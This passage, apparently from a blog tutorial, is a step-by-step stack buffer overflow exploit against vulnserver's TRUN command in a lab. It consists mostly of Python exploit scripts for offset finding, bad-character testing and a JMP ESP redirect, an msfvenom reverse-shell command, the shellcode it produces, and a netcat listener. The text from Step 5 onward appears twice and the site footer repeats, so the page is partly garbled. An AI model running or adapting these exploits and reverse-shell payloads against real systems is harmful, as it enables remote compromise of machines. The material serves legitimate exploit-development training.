offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + offset))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()




This will fully overwrite the EIP. Now copy the EIP value from the Immunity Debugger and paste it to metasploit to find the exact offset


/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337


This will give the exact offset like bellow,

[*] Exact match at offset 2003


Now we need to verify this 2003 offset. For that create 3.py


#!/usr/bin/python
import sys, socket

shellcode = "A" * 2003 + "B" * 4 

try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.0.111',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()


If EIP shows 42424242, that means 4 Bs, that means we control this EIP.

Step 5 (Finding the Bad Characters)


To find bad characters create 4.py.

#!/usr/bin/python
import sys, socket

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

shellcode = "A" * 2003 + "B" * 4 + badchars

try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()


Go to immunity Debugger and Right Click on ESP > Follow in Dump



Step 6 (Finding the right Module)



Go to internet > Search Mona module > Download mona.py > 

Copy paste it to C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands



Go to the immunity debugger > go to this search section and type !mona modules > Enter




This will show us which has no protection modules. So that we can use that, manipulate to jump to our malicious code.



In this case it will show essfunc.dll which is attached to vulnserver (our program). So this is basically a room with no security. So now we have to jump to this room so that we can do whatever we want. Now to do this jump we have to know the OP-code. 



So to jump to a certain destination we need 2 things,



The jump code (The language which machine understand) and the Address




To translate the Assembly jump code OP-code, nasm_shell comes in. 

Go to Terminal > locate nasm_shell > it will give u the address of the ruby file (.rb) > copy that > then paste it in the terminal > will open nasm_shell looks like bellow,


nasm



Now type bellow in the shell,


nasm > JMP ESP



It will return bellow


00000000 FFE4 jmp espnasm




So we got the jump code, Now we need the address,

Go to immunity debugger and the bottom typing area type this


!mona find -s "\xff\xe4" -m essfunc.dll



This will give us multiple possible pointers which are pointing to multiple addresses. 




That means we might have not one but multiple rooms with no security! How cool is that? So we could just tell the program to jump to one of these addresses and in that room we can run our malicious code to gain root access. So Let’s start trying with the first address, which is 0x625011af



Now create another python file and add this address in the shellcode, using the little-endian system.



#!/usr/bin/python
import sys, socket

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()







Now go to immunity debugger and click the last icon under the option button. 



It will ask you to input the address, type the address

 


Which will mark a blue ribbon mark like this on this address with JMP ESP



Now click  F2 , which will highlight this address with cyan. This means we set a breakpoint here. 







Now click the Red play button which is bottom-middle of the Debug and Plugins. This will set the immunity debugger from Paused to Running.



What now you are getting an error saying EIP has been overwritten by 424242 and doesn’t know what to do? LOL. It’s because it crashed. Just quit the Immunity Debugger and reopen it with administrator permission and then attach the vulnserver, as well.


Now find the 0x625011af address and set the breakpoint again. Now hit play.


Now go to the terminal and run the python file that you have created. It will crash the immunity debugger and if you see the EIP you will find out that the address is 625011AF.!



Awesome, this means we own this EIP and can set any address value. As this EIP is the ultimate pointer which will point to any address and the program will follow, when we are placing our desired address the program will go to our desired room and perform whatever the room has in it. 



That means, so far our main tasks were 3

1. To gain access to EIP (the ultimate pointer)

2. To find an address where there is no security and restrictions

3. Set the address value to EIP



Now that we have all 3 main tasks complete, it’s time to set a reverse shell on that address.



Generating ShellCode

Now we have to set a payload on that address (inside that room), so that it can connect back to us. But as it is a machine level language we have to translate the payload to machine level language. And for that we have to type below in the terminal, kali linux,

msfvenom -p windows/shell_reverse_tcp LH0ST=10.0.2.15 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"






This generates something like this,



Copy this payload to another python file like bellow,


#!/usr/bin/python
import sys, socket


overflow = ("\xda\xcc\xba\x46\x10\x1d\x87\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x15\x03\xff\x72\x65"
"\xcb\x7d\x7c\x95\x0c\xe2\xf4\x70\x3d\x22\x62\xf1\x6e\x92"
"\xe0\x57\x83\x59\xa4\x43\x10\x2f\x61\x64\x91\x9a\x57\x4b"
"\x22\xb6\xa4\xca\xa0\xc5\xf8\x2c\x98\x05\x0d\x2d\xdd\x78"
"\xfc\x7f\xb6\xf7\x53\x6f\xb3\x42\x68\x04\x8f\x43\xe8\xf9"
"\x58\x65\xd9\xac\xd3\x3c\xf9\x4f\x37\x35\xb0\x57\x54\x70"
"\x0a\xec\xae\x0e\x8d\x24\xff\xef\x22\x09\xcf\x1d\x3a\x4e"
"\xe8\xfd\x49\xa6\x0a\x83\x49\x7d\x70\x5f\xdf\x65\xd2\x14"
"\x47\x41\xe2\xf9\x1e\x02\xe8\xb6\x55\x4c\xed\x49\xb9\xe7"
"\x09\xc1\x3c\x27\x98\x91\x1a\xe3\xc0\x42\x02\xb2\xac\x25"
"\x3b\xa4\x0e\x99\x99\xaf\xa3\xce\x93\xf2\xab\x23\x9e\x0c"
"\x2c\x2c\xa9\x7f\x1e\xf3\x01\x17\x12\x7c\x8c\xe0\x55\x57"
"\x68\x7e\xa8\x58\x89\x57\x6f\x0c\xd9\xcf\x46\x2d\xb2\x0f"
"\x66\xf8\x15\x5f\xc8\x53\xd6\x0f\xa8\x03\xbe\x45\x27\x7b"
"\xde\x66\xed\x14\x75\x9d\x66\x11\x8a\x9f\x79\x4d\x88\x9f"
"\x94\xd1\x05\x79\xfc\xf9\x43\xd2\x69\x63\xce\xa8\x08\x6c"
"\xc4\xd5\x0b\xe6\xeb\x2a\xc5\x0f\x81\x38\xb2\xff\xdc\x62"
"\x15\xff\xca\x0a\xf9\x92\x90\xca\x74\x8f\x0e\x9d\xd1\x61"
"\x47\x4b\xcc\xd8\xf1\x69\x0d\xbc\x3a\x29\xca\x7d\xc4\xb0"
"\x9f\x3a\xe2\xa2\x59\xc2\xae\x96\x35\x95\x78\x40\xf0\x4f"
"\xcb\x3a\xaa\x3c\x85\xaa\x2b\x0f\x16\xac\x33\x5a\xe0\x50"
"\x85\x33\xb5\x6f\x2a\xd4\x31\x08\x56\x44\xbd\xc3\xd2\x64"
"\x5c\xc1\x2e\x0d\xf9\x80\x92\x50\xfa\x7f\xd0\x6c\x79\x75"
"\xa9\x8a\x61\xfc\xac\xd7\x25\xed\xdc\x48\xc0\x11\x72\x68"
"\xc1")


shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow


try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()




Save it > Change mode to execute. This means our payload is ready. But as it is gonna be a reverse shell connection, we have to open a listener (open a port) in kali linux so that it can connect without any sweat,


Go to terminal and we are gonna open a port with the help of netcat


nc -nvlp 4444


This will start listening to port 4444


Now the moment of truth! Finally it is time for executing the last python file to gain the root access. Before running the python, close the immunity program as we won’t be needing it anymore. Fire up the vulnserver with administration access. 


Are you ready? Fire the last python with the payload and OWN IT !


Step 5 (Finding the Bad Characters)


To find bad characters create 4.py.

#!/usr/bin/python
import sys, socket

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

shellcode = "A" * 2003 + "B" * 4 + badchars

try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()


Go to immunity Debugger and Right Click on ESP > Follow in Dump



Step 6 (Finding the right Module)



Go to internet > Search Mona module > Download mona.py > 

Copy paste it to C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands



Go to the immunity debugger > go to this search section and type !mona modules > Enter




This will show us which has no protection modules. So that we can use that, manipulate to jump to our malicious code.



In this case it will show essfunc.dll which is attached to vulnserver (our program). So this is basically a room with no security. So now we have to jump to this room so that we can do whatever we want. Now to do this jump we have to know the OP-code. 



So to jump to a certain destination we need 2 things,



The jump code (The language which machine understand) and the Address




To translate the Assembly jump code OP-code, nasm_shell comes in. 

Go to Terminal > locate nasm_shell > it will give u the address of the ruby file (.rb) > copy that > then paste it in the terminal > will open nasm_shell looks like bellow,


nasm



Now type bellow in the shell,


nasm > JMP ESP



It will return bellow


00000000 FFE4 jmp espnasm




So we got the jump code, Now we need the address,

Go to immunity debugger and the bottom typing area type this


!mona find -s "\xff\xe4" -m essfunc.dll



This will give us multiple possible pointers which are pointing to multiple addresses. 




That means we might have not one but multiple rooms with no security! How cool is that? So we could just tell the program to jump to one of these addresses and in that room we can run our malicious code to gain root access. So Let’s start trying with the first address, which is 0x625011af



Now create another python file and add this address in the shellcode, using the little-endian system.



#!/usr/bin/python
import sys, socket

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()







Now go to immunity debugger and click the last icon under the option button. 



It will ask you to input the address, type the address

 


Which will mark a blue ribbon mark like this on this address with JMP ESP



Now click  F2 , which will highlight this address with cyan. This means we set a breakpoint here. 







Now click the Red play button which is bottom-middle of the Debug and Plugins. This will set the immunity debugger from Paused to Running.



What now you are getting an error saying EIP has been overwritten by 424242 and doesn’t know what to do? LOL. It’s because it crashed. Just quit the Immunity Debugger and reopen it with administrator permission and then attach the vulnserver, as well.


Now find the 0x625011af address and set the breakpoint again. Now hit play.


Now go to the terminal and run the python file that you have created. It will crash the immunity debugger and if you see the EIP you will find out that the address is 625011AF.!



Awesome, this means we own this EIP and can set any address value. As this EIP is the ultimate pointer which will point to any address and the program will follow, when we are placing our desired address the program will go to our desired room and perform whatever the room has in it. 



That means, so far our main tasks were 3

1. To gain access to EIP (the ultimate pointer)

2. To find an address where there is no security and restrictions

3. Set the address value to EIP



Now that we have all 3 main tasks complete, it’s time to set a reverse shell on that address.



Generating ShellCode

Now we have to set a payload on that address (inside that room), so that it can connect back to us. But as it is a machine level language we have to translate the payload to machine level language. And for that we have to type below in the terminal, kali linux,

msfvenom -p windows/shell_reverse_tcp LH0ST=10.0.2.15 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"






This generates something like this,



Copy this payload to another python file like bellow,


#!/usr/bin/python
import sys, socket


overflow = ("\xda\xcc\xba\x46\x10\x1d\x87\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x15\x03\xff\x72\x65"
"\xcb\x7d\x7c\x95\x0c\xe2\xf4\x70\x3d\x22\x62\xf1\x6e\x92"
"\xe0\x57\x83\x59\xa4\x43\x10\x2f\x61\x64\x91\x9a\x57\x4b"
"\x22\xb6\xa4\xca\xa0\xc5\xf8\x2c\x98\x05\x0d\x2d\xdd\x78"
"\xfc\x7f\xb6\xf7\x53\x6f\xb3\x42\x68\x04\x8f\x43\xe8\xf9"
"\x58\x65\xd9\xac\xd3\x3c\xf9\x4f\x37\x35\xb0\x57\x54\x70"
"\x0a\xec\xae\x0e\x8d\x24\xff\xef\x22\x09\xcf\x1d\x3a\x4e"
"\xe8\xfd\x49\xa6\x0a\x83\x49\x7d\x70\x5f\xdf\x65\xd2\x14"
"\x47\x41\xe2\xf9\x1e\x02\xe8\xb6\x55\x4c\xed\x49\xb9\xe7"
"\x09\xc1\x3c\x27\x98\x91\x1a\xe3\xc0\x42\x02\xb2\xac\x25"
"\x3b\xa4\x0e\x99\x99\xaf\xa3\xce\x93\xf2\xab\x23\x9e\x0c"
"\x2c\x2c\xa9\x7f\x1e\xf3\x01\x17\x12\x7c\x8c\xe0\x55\x57"
"\x68\x7e\xa8\x58\x89\x57\x6f\x0c\xd9\xcf\x46\x2d\xb2\x0f"
"\x66\xf8\x15\x5f\xc8\x53\xd6\x0f\xa8\x03\xbe\x45\x27\x7b"
"\xde\x66\xed\x14\x75\x9d\x66\x11\x8a\x9f\x79\x4d\x88\x9f"
"\x94\xd1\x05\x79\xfc\xf9\x43\xd2\x69\x63\xce\xa8\x08\x6c"
"\xc4\xd5\x0b\xe6\xeb\x2a\xc5\x0f\x81\x38\xb2\xff\xdc\x62"
"\x15\xff\xca\x0a\xf9\x92\x90\xca\x74\x8f\x0e\x9d\xd1\x61"
"\x47\x4b\xcc\xd8\xf1\x69\x0d\xbc\x3a\x29\xca\x7d\xc4\xb0"
"\x9f\x3a\xe2\xa2\x59\xc2\xae\x96\x35\x95\x78\x40\xf0\x4f"
"\xcb\x3a\xaa\x3c\x85\xaa\x2b\x0f\x16\xac\x33\x5a\xe0\x50"
"\x85\x33\xb5\x6f\x2a\xd4\x31\x08\x56\x44\xbd\xc3\xd2\x64"
"\x5c\xc1\x2e\x0d\xf9\x80\x92\x50\xfa\x7f\xd0\x6c\x79\x75"
"\xa9\x8a\x61\xfc\xac\xd7\x25\xed\xdc\x48\xc0\x11\x72\x68"
"\xc1")


shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow


try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()




Save it > Change mode to execute. This means our payload is ready. But as it is gonna be a reverse shell connection, we have to open a listener (open a port) in kali linux so that it can connect without any sweat,


Go to terminal and we are gonna open a port with the help of netcat


nc -nvlp 4444


This will start listening to port 4444


Now the moment of truth! Finally it is time for executing the last python file to gain the root access. Before running the python, close the immunity program as we won’t be needing it anymore. Fire up the vulnserver with administration access. 


Are you ready? Fire the last python with the payload and OWN IT !


Let's talk

Connecting with our clients to create tailor-made solutions

We specialize in crafting exceptional digital experiences to help our clients achieve their business goals.

Framer template crafted with love by Akane Asahi

Let's talk

Connecting with our clients to create tailor-made solutions

We specialize in crafting exceptional digital experiences to help our clients achieve their business goals.

Framer template crafted with love by Akane Asahi

Let's talk

Connecting with our clients to create tailor-made solutions

We specialize in crafting exceptional digital experiences to help our clients achieve their business goals.

Framer template crafted with love by Akane Asahi